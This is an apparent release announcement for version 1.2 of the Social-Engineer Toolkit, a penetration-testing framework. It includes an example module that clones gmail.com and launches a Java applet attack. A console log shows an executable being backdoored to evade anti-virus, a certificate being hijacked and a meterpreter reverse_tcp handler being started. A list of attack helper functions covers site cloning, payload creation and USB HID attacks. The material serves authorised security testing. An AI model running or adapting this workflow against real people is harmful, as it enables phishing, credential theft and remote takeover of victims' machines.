I'm proud to announce the release of the Social-Engineer Toolkit (SET) v1.2 "Shakawkaw". This version of SET does not include any new attack vectors however does incorporate two new exploits from Metasploit, has some bug fixes, but most importantly introduces a significant step in allowing individuals build and automate additions onto the toolkit. I've also updated the User_Manual.pdf which is located under the readme/ directory and the Metasploit Unleashed course should be updated with the latest content. This new version centralized a lot of the code in a "core" functionality that will allow you to build whatever you want to into SET now. In this version it introduced the core library modules and the ability to add third party modules into SET. Essentially, the folder located in the SET root “modules” can add additions or enhancements to SET and add additional contributions to the toolkit. The first thing to note is that when you add a new “.py” file to the modules directory, it will automatically be imported into SET under “Third Party Modules”. Below is an example of a test module: # # These are required fields # import sys # switch over to import core sys.path.append("src/core") # import the core modules try: reload(core) except: import core MAIN="This is a test module" AUTHOR="Dave ‘ReL1K’ [email protected]" # def main(): header is required def main(): core.java_applet_attack("https://gmail.com","443","reports/") pause=raw_input("This module has finished completing. Press to continue") In this example, we create a simple module that will use the java applet attack vector, clone a website and launch the attack for us. It handles creating the Metasploit payloads and everything for us. Ultimately you can create whatever you want to using the function calls built into SET or creating your own. Now if we run SET: root@bt:/pentest/exploits/set# ./set [fusion_builder_container hundred_percent="yes" overflow="visible"][fusion_builder_row][fusion_builder_column type="1_1" background_position="left top" background_color="" border_size="" border_color="" border_style="solid" spacing="yes" background_image="" background_repeat="no-repeat" padding="" margin_top="0px" margin_bottom="0px" class="" id="" animation_type="" animation_speed="0.3" animation_direction="left" hide_on_mobile="no" center_content="no" min_height="none"][---] The Social-Engineer Toolkit (SET) [---] [---] Written by David Kennedy (ReL1K) [---] [---] Version: 1.2 [---] [---] Codename: 'Shakawkaw' [---] [---] Report bugs to: [email protected] [---] [---] Follow Me On Twitter: dave_rel1k [---] [---] Homepage: http://www.secmaniac.com [---] [---] Framework: http://www.social-engineer.org [---] Welcome to the Social-Engineer Toolkit (SET). Your one stop shop for all of your social-engineering needs.. DerbyCon 2011 Sep30-Oct02 - http://www.derbycon.com Select from the menu: 1. Spear-Phishing Attack Vectors 2. Website Attack Vectors 3. Infectious Media Generator 4. Create a Payload and Listener 5. Mass Mailer Attack 6. Teensy USB HID Attack Vector 7. SMS Spoofing Attack Vector 8. Third Party Modules 9. Update the Metasploit Framework 10. Update the Social-Engineer Toolkit 11. Help, Credits, and About 12. Exit the Social-Engineer Toolkit Enter your choice: 8 Welcome to the Social-Engineer Toolkit Third Party Modules menu. Please read the readme/modules.txt for more information on how to create your own modules. 1. This is a test module 2. Return to the previous menu. Enter the module you want to use: 1 [-] Backdooring a legit executable to bypass Anti-Virus. Wait a few seconds... [-] Backdoor completed successfully. Payload is now hidden within a legit executable. [*] UPX Encoding is set to ON, attempting to pack the executable with UPX encoding. [*] Digital Signature Stealing is ON, hijacking a legit digital certificate. [*] Executable created under src/program_junk/ajk1K7Wl.exe [*] Cloning the website: https://gmail.com [*] This could take a little bit... [*] Injecting Java Applet attack into the newly cloned website. [*] Filename obfuscation complete. Payload name is: m3LrpBcbjm13u [*] Malicious java applet website prepped for deployment Site has been successfully cloned and is: reports/ [*] Starting the multi/handler through Metasploit... =[ metasploit v3.6.0-dev [core:3.6 api:1.0] + -- --=[ 644 exploits - 328 auxiliary + -- --=[ 216 payloads - 27 encoders - 8 nops =[ svn r11638 updated today (2011.01.25) resource (/pentest/exploits/set/src/program_junk/msf_answerfile)> use multi/handler resource (/pentest/exploits/set/src/program_junk/msf_answerfile)> set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp resource (/pentest/exploits/set/src/program_junk/msf_answerfile)> set LHOST 0.0.0.0 LHOST => 0.0.0.0 resource (/pentest/exploits/set/src/program_junk/msf_answerfile)> set LPORT 443 LPORT => 443 resource (/pentest/exploits/set/src/program_junk/msf_answerfile)> exploit -j [*] Exploit running as background job. [*] Started reverse handler on 0.0.0.0:443 [*] Starting the payload handler... msf exploit(handler) > msf exploit(handler) > msf exploit(handler) > exit This module has finished completing. Press to continue The core system files are located under src/core/core.py and can be modified and expanded upon. Here is a list of all of the current function calls supported and their parameters: core.meta_path() # Returns the path of the Metasploit directory in the set_config core.grab_ipaddress() # Returns your IP address used for the attacks core.check_pexpect() # Checks to see if the Python module PEXPECT is installed core.check_beautifulsoup() # Check to see if the Python module BeautifulSoup is installed core.cleanup_routine() # Removed stale process information, files, etc. core.update_metasploit() # Updates the Metasploit framework core.update_set() # Updates the Social-Engineer Toolkit core.help_menu() # Displays the help menu core.date_time() # Displays the date and time core.generate_random_string(low,high) # generates a number between the low and high range (random). So you could use generate_random_string(1,30) and it will create a unique string between 1 and 30 characters long core.site_cloner(website,exportpath, *args) # clones a website and exports it to a specific path. So for example you could use core.site_cloner(“https://gmail.com”,”reports/”) and it will clone the website and export it to the reports directory. core.meterpreter_reverse_tcp_exe(port) # creates a meterpreter reverse payload, only need to specify port. core.metasploit_listener_start(payload,port) # creates a meterpreter listener, only need to specify payload (example windows/meterpreter/reverse_tcp) and port. core.start_web_server(directory) # Starts a web server in the directory root you specify, for example core.start_web_server(“reports”) core.java_applet_attack(website,port,directory) # Clones a website, creates meterpreter backdoor, starts a webserver and creates the listener. The port is the meterpreter reverse listener port. Example core.java_applet_attack(“https://gmail.com”,”443”,”reports/”) core.teensy_pde_generator(attack_method) # Creates a teensy pde file you can use for the teensy USB HID attack vector. You can call the following attack methods: beef, powershell_down, powershell_reverse, java_applet, and wscript. Example: teensy_pde_generator(“powershell_reverse”) [/fusion_builder_column][/fusion_builder_row][/fusion_builder_container]